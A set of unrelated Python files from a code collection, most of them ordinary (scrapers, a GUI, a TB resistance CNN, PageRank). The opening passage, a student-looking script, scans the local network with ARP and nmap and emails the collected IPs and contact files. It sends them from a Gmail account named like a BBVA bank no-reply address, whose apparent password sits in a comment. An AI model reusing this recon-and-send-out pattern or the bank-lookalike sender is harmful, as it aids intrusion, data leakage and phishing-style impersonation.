open(\"ips.txt\", \"w\")\n print(\"Scanning...\")\n # iniciamos el scaneo\n arp_request = scapy.ARP(pdst=ip_local.ip_local+\"/24\")\n brodcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp = brodcast / arp_request\n barra()\n answered = scapy.srp(arp, timeout=1, verbose=False)[0]\n # Guardamos en un txt las ip y las mac addres\n # con un for recorriendo answered\n for element in answered:\n archivo.write(\"IP:{} \".format(element[1].psrc))\n archivo.write(\" MAC address: {}\\n \".format(element[1].hwsrc))\n archivo.close()\n print(\"Archivo con ip´s activas en la\" +\n \"red local ingresada generado con exito\")\n logging.info(hora[0:19]+\" Ejecucion de funcion scan correctamente\")\n correcto = True\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion scan fallo \")\n correcto = False\n return correcto\n\n\n# Se Empieza a leer el archivo que contiene las ip para almacenar en una lista\n\n\ndef Ports(puertos,ip_local):\n hora = ño() \n try:\n archivo=open('puertos_scaneado.txt','w')\n ip_add_pattern = re.compile(\"^(?:[0-9]{1,3}\\.){3}[0-9]{1,3}$\")\n port_range_pattern = re.compile(\"([0-9]+)-([0-9]+)\")\n port_min = 0\n port_max = 65535\n open_ports = []\n while True:\n ip_add_entered = ip_local.ip_local\n if ip_add_pattern.search(ip_add_entered):\n print(f\"{ip_add_entered} is a valid ip address\")\n break\n while True:\n port_range = puertos.puerto\n port_range_valid = port_range_pattern.search(port_range.replace(\" \",\"\"))\n if port_range_valid:\n port_min = int(port_range_valid.group(1))\n port_max = int(port_range_valid.group(2))\n break\n nm = nmap.PortScanner()\n for port in range(port_min, port_max + 1):\n try:\n result = nm.scan(ip_add_entered, str(port))\n port_status = (result['scan'][ip_add_entered]['tcp'][port]['state'])\n archivo.write(nm.csv()+(f\"Port {port} is {port_status}\")+'\\n')\n except:\n print(f\"Cannot scan port {port}.\")\n archivo.close()\n logging.info(hora[0:19]+\" Ejecucion de funcion ports correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion ports fallo\")\n pass\n\n\n# Echale un ojo a esta funcion max y carlos \n\n\ndef my_ip():\n hora = ño()\n try:\n url1 = 'https://www.cual-es-mi-ip.net/'\n # Peticiones a cada uno de los links\n page1 = requests.get(url1)\n soup1 = BeautifulSoup(page1.content, \"html.parser\")\n origen = soup1.find_all(\"span\", class_=\"big-text font-arial\")\n for i in origen:\n ip_public = i.text\n code = page1.status_code\n if code == 200:\n return ip_public\n else:\n ip = ''\n logging.info(hora[0:19]+\" Ejecucion de funcion my_ip correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion my_ip fallo\")\n pass\n\n\ndef enviar_sms(numero,mensaje):\n hora = ño()\n try:\n archivo=open('C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/llaves.txt')\n claves=[]\n lineas = archivo.readlines()\n for linea in lineas:\n claves.append(linea)\n archivo.close()\n accountSID =claves[0]\n authToken = claves[1]\n twilioCli = Client(accountSID,authToken)\n\n myTwilioNumber = claves[2]\n\n destCellPhone = '+52'+numero.numero\n\n msg = mensaje.msg\n message = twilioCli.messages.create(to = destCellPhone,\n from_ = myTwilioNumber,\n body = msg)\n print(message.to)\n logging.info(hora[0:19]+\" Ejecucion de funcion enviar_sms correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion enviar_sms fallo\")\n pass\n\n\n## Lugar de trabajo de carlos\n## Correo que estamos usando paymentsnoreplybbva@gmail.com\n## Fporeladmin1\n\n\ndef enviar_Correo_mamalon(user):\n hora = ño()\n try:\n archivo=open('C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/pass.txt','r')\n contraseña = archivo.readline()\n archivo=open(\"C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/Correos.txt\")\n correos = []\n lineas = archivo.readlines()\n for linea in lineas:\n correos.append(linea.rstrip())\n fromaddr = user.user_name\n password = contraseña\n toaddrs = correos\n\n content = 'Este es el reporte de fin de mes. ' + hora[0:19]\n textApart = MIMEText(content)\n\n\n datosFile = '.\\datos.txt'\n datosApart = MIMEImage(open(datosFile, 'rb').read(), datosFile.split('.')[-1])\n datosApart.add_header('Content-Disposition', 'attachment', filename=\"datos.txt\")\n\n ipsFile = '.\\ips.txt'\n ipsApart = MIMEApplication(open(ipsFile, 'rb').read())\n ipsApart.add_header('Content-Disposition', 'attachment', filename=\"ip's.txt\")\n\n correosFile = '.\\correos.txt'\n correosApart = MIMEApplication(open(correosFile, 'rb').read())\n correosApart.add_header('Content-Disposition', 'attachment', filename=\"correos.txt\")\n\n #uanlFile = '.\\uanl.txt'\n #uanlApart = MIMEApplication(open(uanlFile, 'rb', encoding=\"utf-8\").read())\n #uanlApart.add_header('Content-Disposition', 'attachment', filename=\"uanl.txt\")\n\n infoFile = '.\\info.log'\n infoApart = MIMEApplication(open(infoFile, 'rb').read())\n infoApart.add_header('Content-Disposition', 'attachment', filename=\"info.log\")\n\n\n m = MIMEMultipart()\n m.attach(textApart)\n m.attach(datosApart)\n m.attach(ipsApart)\n m.attach(correosApart)\n #m.attach(uanlApart)\n m.attach(infoApart)\n m['Subject'] = 'Reporte'\n\n try:\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(fromaddr,password)\n server.sendmail(fromaddr, toaddrs, m.as_string())\n print('success')\n server.quit()\n except smtplib.SMTPException as e:\n print ('error:', e) # Error de impresión\n logging.info(hora[0:19]+\" Ejecucion de funcion enviar correo correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion enviar correo fallo\")\n pass\n","sub_path":"01-11-2021/analisis.py","file_name":"analisis.py","file_ext":"py","file_size_in_byte":10131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"604306106","text":"import urllib.request\n\nfile = open(\"out.txt\", \"w\")\n\nurl = \"http://annarboradulthockey.com/master_sched_league.php?day=\"\n\n\nd = input(\"Enter The Day: \")\nm = input(\"Enter The Month: \")\ny = input(\"Enter The Year: \")\n\nurl += d+\"&month=\"+m+\"&year=\"+y\n\nprint(url)\n\nreq = urllib.request.Request(\n url,\n data=None,\n headers={\n 'User-Agent': 'Mozilla/5.0'\n }\n)\n\nf = urllib.request.urlopen(req)\nhtmlstr = (f.read().decode('utf-8'))\n\narray1 = [\"\"]\n\n#get the schedule table from url and write it to out.txt\ndef getTable(mystr):\n #remove unneeded html\n mystr = mystr[mystr.find(\"
\"):]\n mystr = mystr[:mystr.find(\"
\")]\n\n while(1==1):\n y = mystr.find(\"\")\n if(y == -1):\n break\n array1.append(mystr[:y])\n mystr = mystr[y+4:]\n\n array1.pop(0)\n\ndef formatLine(line):\n visitor = line[line.find(\"- \") + 2:line.find(\" (\")]\n home = line[line.find(\"@ \") + 7:line[line.find(\"@ \"):].find(\" (\") + line.find(\"@ \")]\n location = line[len(line) - 12:len(line) - 5]\n line = visitor + \",\" + home + \",\" + location\n return line\n #print(line)\n\ndef sortarr(arr):\n oc = 0\n sc = 0\n vc = 0\n olympicT = []\n stadiumT = []\n varsityT = []\n for x in arr:\n if(x.find(\"Olympic\") != -1):\n olympicT.append(x[:len(x) - 8])\n if(x.find(\"Stadium\") != -1):\n stadiumT.append(x[:len(x) - 8])\n if(x.find(\"Varsity\") != -1):\n varsityT.append(x[:len(x) - 8])\n\n result = []\n result.append(olympicT)\n result.append(stadiumT)\n result.append(varsityT)\n\n return result\n\n#main calls\ngetTable(htmlstr)\ni= 0\nfor x in array1:\n array1[i] = formatLine(x)\n i += 1\n\n#write to out.txt\narray1 = sortarr(array1)\nfor x in array1:\n file.write(str(len(x)) + \"\\n\")\n\nfor x in array1:\n for y in x:\n file.write(y + \"\\n\")\n file.write(\"\\n\")\n\nfile.close()\n","sub_path":"getSchedule.py","file_name":"getSchedule.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"623816693","text":"from math import *\nimport turtle as t\n\nt.shape('circle')\nt.speed(1000)\nt.left(90)\nk = 0\ndef infinity():\n for x in range(72):\n t.forward(5 + k)\n t.left(5)\n for y in range(72):\n t.forward(5 + k)\n t.right(5)\nfor i in range(7):\n infinity()\n k += 1\n","sub_path":"turtle/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"615293590","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass Ui_Dialog(object):\r\n def setupUi(self, Dialog):\r\n Dialog.setObjectName(\"Dialog\")\r\n Dialog.resize(805, 533)\r\n self.exitButton = QtWidgets.QPushButton(Dialog)\r\n self.exitButton.setGeometry(QtCore.QRect(320, 480, 113, 32))\r\n self.exitButton.setObjectName(\"exitButton\")\r\n self.label = QtWidgets.QLabel(Dialog)\r\n self.label.setGeometry(QtCore.QRect(20, 10, 60, 16))\r\n self.label.setObjectName(\"label\")\r\n self.fileHandlingFrame = QtWidgets.QFrame(Dialog)\r\n self.fileHandlingFrame.setGeometry(QtCore.QRect(20, 30, 631, 81))\r\n self.fileHandlingFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.fileHandlingFrame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.fileHandlingFrame.setObjectName(\"fileHandlingFrame\")\r\n self.openReadButton = QtWidgets.QPushButton(self.fileHandlingFrame)\r\n self.openReadButton.setGeometry(QtCore.QRect(10, 20, 201, 41))\r\n self.openReadButton.setObjectName(\"openReadButton\")\r\n self.filePath = QtWidgets.QTextEdit(self.fileHandlingFrame)\r\n self.filePath.setGeometry(QtCore.QRect(220, 10, 401, 61))\r\n self.filePath.setObjectName(\"filePath\")\r\n self.label_2 = QtWidgets.QLabel(Dialog)\r\n self.label_2.setGeometry(QtCore.QRect(20, 130, 81, 16))\r\n self.label_2.setObjectName(\"label_2\")\r\n self.ductReportFrame = QtWidgets.QFrame(Dialog)\r\n self.ductReportFrame.setGeometry(QtCore.QRect(20, 150, 741, 311))\r\n self.ductReportFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.ductReportFrame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.ductReportFrame.setObjectName(\"ductReportFrame\")\r\n self.runLengthFrame = QtWidgets.QFrame(self.ductReportFrame)\r\n self.runLengthFrame.setGeometry(QtCore.QRect(520, 29, 211, 141))\r\n self.runLengthFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.runLengthFrame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.runLengthFrame.setObjectName(\"runLengthFrame\")\r\n self.label_4 = QtWidgets.QLabel(self.runLengthFrame)\r\n self.label_4.setGeometry(QtCore.QRect(10, 10, 81, 21))\r\n self.label_4.setObjectName(\"label_4\")\r\n self.diffuserID = QtWidgets.QLineEdit(self.runLengthFrame)\r\n self.diffuserID.setGeometry(QtCore.QRect(90, 10, 113, 21))\r\n self.diffuserID.setObjectName(\"diffuserID\")\r\n self.label_5 = QtWidgets.QLabel(self.runLengthFrame)\r\n self.label_5.setGeometry(QtCore.QRect(10, 40, 71, 21))\r\n self.label_5.setObjectName(\"label_5\")\r\n self.runLength = QtWidgets.QLineEdit(self.runLengthFrame)\r\n self.runLength.setGeometry(QtCore.QRect(90, 40, 113, 21))\r\n self.runLength.setObjectName(\"runLength\")\r\n self.label_6 = QtWidgets.QLabel(self.runLengthFrame)\r\n self.label_6.setGeometry(QtCore.QRect(10, 70, 111, 16))\r\n self.label_6.setObjectName(\"label_6\")\r\n self.longestRunPath = QtWidgets.QTextEdit(self.runLengthFrame)\r\n self.longestRunPath.setGeometry(QtCore.QRect(10, 90, 191, 41))\r\n self.longestRunPath.setObjectName(\"longestRunPath\")\r\n self.label_3 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_3.setGeometry(QtCore.QRect(521, 10, 131, 16))\r\n self.label_3.setObjectName(\"label_3\")\r\n self.label_7 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_7.setGeometry(QtCore.QRect(521, 180, 181, 16))\r\n self.label_7.setObjectName(\"label_7\")\r\n self.label_8 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_8.setGeometry(QtCore.QRect(531, 200, 91, 16))\r\n self.label_8.setObjectName(\"label_8\")\r\n self.label_9 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_9.setGeometry(QtCore.QRect(531, 240, 91, 16))\r\n self.label_9.setObjectName(\"label_9\")\r\n self.label_10 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_10.setGeometry(QtCore.QRect(531, 220, 181, 16))\r\n self.label_10.setObjectName(\"label_10\")\r\n self.ductReport = QtWidgets.QTextEdit(self.ductReportFrame)\r\n self.ductReport.setGeometry(QtCore.QRect(10, 20, 491, 251))\r\n self.ductReport.setObjectName(\"ductReport\")\r\n\r\n self.retranslateUi(Dialog)\r\n QtCore.QMetaObject.connectSlotsByName(Dialog)\r\n\r\n def retranslateUi(self, Dialog):\r\n _translate = QtCore.QCoreApplication.translate\r\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\r\n self.exitButton.setText(_translate(\"Dialog\", \"Exit\"))\r\n self.label.setText(_translate(\"Dialog\", \"Duct File\"))\r\n self.openReadButton.setText(_translate(\"Dialog\", \"Open and Read a Duct File\"))\r\n self.filePath.setText(_translate(\"Dialog\", \"Duct Design Input File 1.txt\"))\r\n self.label_2.setText(_translate(\"Dialog\", \"Duct Report\"))\r\n self.label_4.setText(_translate(\"Dialog\", \"Diffuser ID\"))\r\n self.label_5.setText(_translate(\"Dialog\", \"Run Length\"))\r\n self.label_6.setText(_translate(\"Dialog\", \"Longest Run Path\"))\r\n self.label_3.setText(_translate(\"Dialog\", \"Longest Length Run\"))\r\n self.label_7.setText(_translate(\"Dialog\", \"Contributors to this program:\"))\r\n self.label_8.setText(_translate(\"Dialog\", \"Jason Conway\"))\r\n self.label_9.setText(_translate(\"Dialog\", \"Malorie Travis\"))\r\n self.label_10.setText(_translate(\"Dialog\", \"Abdalrahman (Mann) Mansy\"))\r\n\r\n","sub_path":"HW8/Duct_Design.py","file_name":"Duct_Design.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"327253676","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\nRuns multitask model with conv-conv-pool architecture, 5 fold cross validation on training/validation set\nThis is the architecture used for the final MD-CNN model\n\nAuthors:\n\tMichael Chen (original version)\n\tAnna G. Green\n\tChang Ho Yoon\n\"\"\"\n\nimport sys\nimport glob\nimport os\nimport yaml\nimport sparse\n\nimport tensorflow as tf\nimport keras.backend as K\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import roc_auc_score, average_precision_score\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import models\nfrom tb_cnn_codebase import *\n\ndef run():\n\n def get_conv_nn():\n \"\"\"\n Define convolutional neural network architecture\n\n NB filter_size is a global variable (int) given by the kwargs\n \"\"\"\n\n\t\t#TODO: replace X.shape with passed argument\n model = models.Sequential()\n\t\t#TODO: add filter size argument\n model.add(layers.Conv2D(\n 64, (5, filter_size),\n data_format='channels_last',\n activation='relu',\n input_shape = X.shape[1:]\n ))\n model.add(layers.Lambda(lambda x: K.squeeze(x, 1)))\n model.add(layers.Conv1D(64, 12, activation='relu'))\n model.add(layers.MaxPooling1D(3))\n model.add(layers.Conv1D(32, 3, activation='relu'))\n model.add(layers.Conv1D(32, 3, activation='relu'))\n model.add(layers.MaxPooling1D(3))\n model.add(layers.Flatten())\n model.add(layers.Dense(256, activation='relu', name='d1'))\n model.add(layers.Dense(256, activation='relu', name='d2'))\n model.add(layers.Dense(13, activation='sigmoid', name='d4'))\n\n opt = Adam(learning_rate=np.exp(-1.0 * 9))\n\n model.compile(optimizer=opt,\n loss=masked_multi_weighted_bce,\n metrics=[masked_weighted_accuracy])\n\n return model\n\n class myCNN:\n \"\"\"\n Class for handling CNN functionality\n\n \"\"\"\n def __init__(self):\n self.model = get_conv_nn()\n self.epochs = N_epochs\n\n def fit_model(self, X_train, y_train, X_val=None, y_val=None):\n \"\"\"\n X_train: np.ndarray\n n_strains x 5 (one-hot) x longest locus length x no. of loci\n Genotypes of isolates used for training\n y_train: np.ndarray\n Labels for isolates used for training\n\n X_val: np.ndarray (optional, default=None)\n Optional genotypes of isolates in validation set\n\n y_val: np.ndarray (optional, default=None)\n Optional labels for isolates in validation set\n\n Returns\n -------\n pd.DataFrame:\n training history (accuracy, loss, validation accuracy, and validation loss) per epoch\n\n \"\"\"\n if X_val is not None and y_val is not None:\n history = self.model.fit(\n X_train, y_train,\n epochs=self.epochs,\n validation_data=(X_val, y_val),\n batch_size=128\n )\n print('\\nhistory dict:', history.history)\n return pd.DataFrame.from_dict(data=history.history)\n else:\n history = self.model.fit(X_train, y_train, epochs=self.epochs, batch_size=128)\n print('\\nhistory dict:', history.history)\n return pd.DataFrame.from_dict(data=history.history)\n\n def predict(self, X_val):\n \n return np.squeeze(self.model.predict(X_val))\n\n _, input_file = sys.argv\n\n # load kwargs from config file (input_file)\n kwargs = yaml.safe_load(open(input_file, \"r\"))\n print(kwargs)\n output_path = kwargs[\"output_path\"]\n N_epochs = kwargs[\"N_epochs\"]\n filter_size = kwargs[\"filter_size\"]\n pkl_file = kwargs[\"pkl_file\"]\n\n # Determine whether pickle already exists\n if os.path.isfile(pkl_file):\n print(\"pickle file already exists, proceeding with modeling\")\n else:\n print(\"creating genotype phenotype pickle\")\n make_geno_pheno_pkl(**kwargs)\n\n # # Get data from pickle\n df_geno_pheno = pd.read_pickle(pkl_file)\n print(\"read in the pkl\")\n\n pkl_file_sparse_train = kwargs['pkl_file_sparse_train']\n pkl_file_sparse_test = kwargs['pkl_file_sparse_test']\n #\n if os.path.isfile(pkl_file_sparse_train) and os.path.isfile(pkl_file_sparse_test):\n print(\"X input already exists, loading X\")\n X_sparse_train = sparse.load_npz(pkl_file_sparse_train)\n #X_sparse_test = sparse.load_npz(pkl_file_sparse_test)\n\n else:\n print(\"creating X pickle\")\n X_all = create_X(df_geno_pheno)\n\n X_sparse = sparse.COO(X_all)\n\n X_all = X_sparse.todense()\n assert (X_all.shape[0] == len(df_geno_pheno))\n\n df_geno_pheno = df_geno_pheno.reset_index(drop=True)\n\n train_indices = df_geno_pheno.query(\"category=='set1_original_10202'\").index\n test_indices = df_geno_pheno.query(\"category!='set1_original_10202'\").index\n\n print(\"splitting X pkl\")\n X_sparse_train = X_sparse[train_indices, :]\n X_sparse_test = X_sparse[test_indices, :]\n del X_sparse\n\n #X_sparse_train = sparse.COO(X_train)\n sparse.save_npz(pkl_file_sparse_train, X_sparse_train, compressed=False)\n\n #X_sparse_test = sparse.COO(X_test)\n sparse.save_npz(pkl_file_sparse_test, X_sparse_test, compressed=False)\n\n drugs = ['RIFAMPICIN', 'ISONIAZID', 'PYRAZINAMIDE',\n 'ETHAMBUTOL', 'STREPTOMYCIN', 'LEVOFLOXACIN',\n 'CAPREOMYCIN', 'AMIKACIN', 'MOXIFLOXACIN',\n 'OFLOXACIN', 'KANAMYCIN', 'ETHIONAMIDE',\n 'CIPROFLOXACIN']\n\n y_all_train, y_array = rs_encoding_to_numeric(df_geno_pheno.query(\"category=='set1_original_10202'\"), drugs)\n\n num_drugs = len(drugs)\n\n # obtain phenotype data for CNN\n y_all_train = y_all_train[drugs].values.astype(np.int)\n\n # obtain isolates with at least 1 resistance status to length of drugs\n ind_with_phenotype = np.where(y_all_train.sum(axis=1) != -num_drugs)\n\n X = X_sparse_train[ind_with_phenotype]\n print(\"the shape of X is {}\".format(X.shape))\n\n y = y_all_train[ind_with_phenotype]\n print(\"the shape of y is {}\".format(y.shape))\n\n alpha_matrix_path = kwargs[\"alpha_file\"]\n alpha_matrix = load_alpha_matrix(alpha_matrix_path, y_array, df_geno_pheno)\n del df_geno_pheno\n\n\n ### Perform 5-fold cross validation\n cv_splits = 5\n\n cv = KFold(n_splits=cv_splits, shuffle=True, random_state=1)\n\n column_names = ['Algorithm', 'Drug', 'AUC', 'AUC_PR', \"threshold\", \"spec\", \"sens\"]\n results = pd.DataFrame(columns=column_names)\n i = 0\n\n for train_idx, (train, val) in enumerate(cv.split(X, y)):\n model = myCNN()\n X_train = X[train, :].todense()\n X_val = X[val, :].todense()\n y_train = y[train, :]\n y_val = y[val, :]\n\n print('fitting..')\n history = model.fit_model(X_train, alpha_matrix[train, :], X_val, alpha_matrix[val, :])\n history.to_csv(output_path + \"history_cv_split\" + str(train_idx) + \".csv\")\n print('predicting..')\n y_pred = model.predict(X_val)\n\n for idx, drug in enumerate(drugs):\n non_missing_val = np.where(y_val[:, idx] != -1)[0]\n auc_y = np.reshape(y_val[non_missing_val, idx], (len(non_missing_val), 1))\n auc_preds = np.reshape(y_pred[non_missing_val, idx], (len(non_missing_val), 1))\n val_auc = roc_auc_score(auc_y, auc_preds)\n val_auc_pr = average_precision_score(1 - y_val[non_missing_val, idx], 1 - y_pred[non_missing_val, idx])\n val__ = get_threshold_val(y_val[non_missing_val, idx], y_pred[non_missing_val, idx])\n val_threshold = float(val__[\"threshold\"])\n val_spec = val__['spec']\n val_sens = val__['sens']\n\n results.loc[i] = ['CNN', drug, val_auc, val_auc_pr, val_threshold, val_spec, val_sens]\n\n i += 1\n\n K.clear_session()\n\n results.to_csv(output_path + \"_auc.csv\")\n\n\nrun()\n","sub_path":"md_cnn/model_training/run_MDCNN_ccp_crossval.py","file_name":"run_MDCNN_ccp_crossval.py","file_ext":"py","file_size_in_byte":8202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"568305616","text":"import actions_v4 as a\nimport notwatching_v4 as n\nimport addwhitelist_v4 as w \nimport output_v4 as ou\n\nprint('hi')\nq1 = input('Welcome to interaction with me, what do you want to do? DeleteWatch, AddWhite, or AccessEntry ')\n\nif q1 != 'DeleteWatch' and q1 != 'AddWhite' and q1!='AccessEntry':\n print('sorry we are still growing, more functions might be provided later ')\nelse:\n if q1 == 'DeleteWatch':\n q2 = input(\"do you want to delete anything from the watchlist? reply 'yes' or 'no' \")\n if q2 == 'yes':\n ip = input('what is the ip that you dont need to watchlist: ')\n name = input('what is the corresponding username: ')\n n.remove_from_watchlist(ip,name)\n q3 = input(\"do you want to reset the count of this entry? reply 'yes' or 'no' \")\n if q3 == 'yes':\n n.reset_count(ip,name)\n print('you are all set')\n else:\n print('fine')\n ou.output_watchlist()\n elif q1 == 'AddWhite':\n q4 = input('what is the ip that you want to whitelisted: ')\n w.add_whi(q4)\n print('done')\n else:\n q5 = input(\"What is the ip that you want to look up for: \")\n q6 = input(\"Do you know the username? No or [username]\")\n if q6 == 'No':\n # if just want to look up by ip without knowing username \n a.find_ip(q5)\n else:\n q7 = input('which scope? (successful,Invalid, FAILED')\n if q7 != 'successful' and q7 != 'Invalid' and q7 != 'FAILED':\n print('No messing around, see ya')\n else:\n a.resume(q5,q6,q7)\n\n","sub_path":"version 4 /interaction_v4.py","file_name":"interaction_v4.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"259905207","text":"\"\"\"Two fast implementations of PageRank:\n An exact solution using a sparse linear system solver,\n and an a power method approximation.\n Both solutions are taking full advantage of sparse matrix calculations.\n\n [Reference]:\n Cleve Moler. 2011. Experiments with MATLAB (Electronic ed.).\n MathWorks, Inc.\n\"\"\"\n# uncomment\nfrom __future__ import division\n\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sprs\nimport scipy.spatial\nimport scipy.sparse.linalg\n\n__author__ = \"Armin Sajadi\"\n__copyright__ = \"Copyright 2015, The Wikisim Project\"\n__email__ = \"asajadi@gmail.com\"\n\n\ndef pagerank(A, p=0.85,\n personalize=None, reverse=False):\n \"\"\" Calculates PageRank given a csr graph\n\n Inputs:\n -------\n\n G: a csr graph.\n p: damping factor\n personlize: if not None, should be an array with the size of the nodes\n containing probability distributions.\n It will be normalized automatically\n reverse: If true, returns the reversed-PageRank\n\n outputs\n -------\n\n PageRank Scores for the nodes\n\n \"\"\"\n # In Moler's algorithm, $A_{ij}$ represents the existences of an edge\n # from node $j$ to $i$, while we have assumed the opposite!\n if reverse:\n A = A.T\n\n n, _ = A.shape\n r = np.asarray(A.sum(axis=1)).reshape(-1)\n\n k = r.nonzero()[0]\n\n D_1 = sprs.csr_matrix((1 / r[k], (k, k)), shape=(n, n))\n\n if personalize is None:\n personalize = np.ones(n)\n personalize = personalize.reshape(n, 1)\n s = (personalize / personalize.sum()) * n\n\n I = sprs.eye(n)\n x = sprs.linalg.spsolve((I - p * A.T @ D_1), s)\n\n x = x / x.sum()\n return x\n\n\ndef pagerank_power(A, p=0.85, max_iter=100,\n tol=1e-06, personalize=None, reverse=False):\n \"\"\" Calculates PageRank given a csr graph\n\n Inputs:\n -------\n A: a csr graph.\n p: damping factor\n max_iter: maximum number of iterations\n personlize: if not None, should be an array with the size of the nodes\n containing probability distributions.\n It will be normalized automatically.\n reverse: If true, returns the reversed-PageRank\n\n Returns:\n --------\n PageRank Scores for the nodes\n\n \"\"\"\n # In Moler's algorithm, $G_{ij}$ represents the existences of an edge\n # from node $j$ to $i$, while we have assumed the opposite!\n if reverse:\n A = A.T\n\n n, _ = A.shape\n r = np.asarray(A.sum(axis=1)).reshape(-1)\n\n k = r.nonzero()[0]\n\n D_1 = sprs.csr_matrix((1 / r[k], (k, k)), shape=(n, n))\n\n if personalize is None:\n personalize = np.ones(n)\n personalize = personalize.reshape(n, 1)\n s = (personalize / personalize.sum()) * n\n\n z_T = (((1 - p) * (r != 0) + (r == 0)) / n)[np.newaxis, :]\n W = p * A.T @ D_1\n\n x = s / n\n oldx = np.zeros((n, 1))\n\n iteration = 0\n\n while np.linalg.norm(x - oldx) > tol:\n oldx = x\n x = W @ x + s @ (z_T @ x)\n iteration += 1\n if iteration >= max_iter:\n break\n x = x / sum(x)\n\n return x.reshape(-1)\n","sub_path":"build/lib/fast_pagerank/fast_pagerank.py","file_name":"fast_pagerank.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"631934377","text":"from mainapp.qip_dns_query import get_switch_ips\nimport base64\nfrom mainapp.show_ip_parser import parse_switch_ips\nfrom mainapp.gather_old_info import gather_old_switch_info\nfrom mainapp.show_command_parsers import parse_show_run_interface\nfrom mainapp.rename_interfaces import rename_vlan_port_list, rename_interface\nfrom mainapp.qip_dns_query import get_switch_ips\nfrom datetime import date\nimport re\nimport pdb\n\nhostname = \"\"\nCLOSET = \"\"\nONHILL = \"\"\nBUILDENGINEER = \"\"\nBUILDDATE = \"\"\nMEMBERS = \"\"\nLOOPBACK = \"\"\n\nAGG_INT_NAME = \"\"\n\nV100_VRRP = \"\"\nV100_GW = \"\"\nV300_VRRP = \"\"\nV200_GW = \"\"\nV555_VRRP = \"\"\nV555_GW = \"\"\nV701_VRRP = \"\"\nV701_GW = \"\"\nV702_VRRP = \"\"\nV702_GW = \"\"\nV703_VRRP = \"\"\nV703_GW = \"\"\nVLAN_INDEX = \"\"\nUPLINK_1_IP = \"\"\nUPLINK_2_IP = \"\"\nINTER_REG = \"\"\n\nLICENSE_KEY_1 = \"\"\nLICENSE_KEY_2 = \"\"\nDATE = date.today().strftime('%m\\%d\\%Y')\n\ndef rename_cisco_to_junos(cisco_switch):\n juniper_interfaces = dict()\n for k,v in cisco_switch['interfaces'].items():\n j = rename_interface(k)\n juniper_interfaces[j] = {'vlan': '', 'voice': ''}\n if k in cisco_switch['descriptions'].keys():\n juniper_interfaces[j]['description'] = cisco_switch['descriptions'][k]\n if v:\n if 'voice' in v and 'vlan' in v:\n juniper_interfaces[j]['vlan'] = cisco_switch['vlans'][v['vlan']]['name'].upper()\n juniper_interfaces[j]['voice'] = cisco_switch['vlans'][v['voice']]['name'].upper()\n elif 'vlan' in v:\n juniper_interfaces[j]['vlan'] = cisco_switch['vlans'][v['vlan']]['name'].upper()\n juniper_interfaces[j]['voice'] = None\n return juniper_interfaces\n\ndef create_template(old_switch_info, dns_records):\n new_switch = dict()\n new_switch['loopback'] = find_new_loopback(old_switch_info['hostname'], dns_records)\n new_switch['interregion'] = find_interregion(old_switch_info['hostname'], dns_records)\n new_switch['nameserver'] = old_switch_info['nameserver']\n new_switch['members'] = old_switch_info['members']\n new_switch['vlans'] = old_switch_info['vlans']\n new_switch['hostname'] = old_switch_info['hostname']\n new_switch['location'] = old_switch_info['location']\n new_switch['vlan_index'] = old_switch_info['vlan_index']\n if new_switch['members'] > 1:\n new_switch['mgmt_range_end'] = 1\n else:\n new_switch['mgmt_range_end'] = 0\n new_switch['vlan_ips'] = old_switch_info['ips']['vlan_ips']\n new_switch['vrrp'] = find_vrrp_addresses(old_switch_info['vlans'], old_switch_info['ips']['vlan_ips'], dns_records)\n return new_switch\n \ndef find_new_loopback(hostname, dns_records):\n for item in dns_records:\n if item['name'].lower() == '{}-new.ohsu.edu'.format(hostname.lower()):\n return item['address']\n\ndef find_interregion(hostname, dns_records):\n for item in dns_records:\n if 'irb' in item['name'].lower() and '2399' in item['name'].lower():\n return item['address']\n\ndef find_vrrp_addresses(vlans, vlan_ips, dns_records):\n vrrp = dict()\n vlan_re = 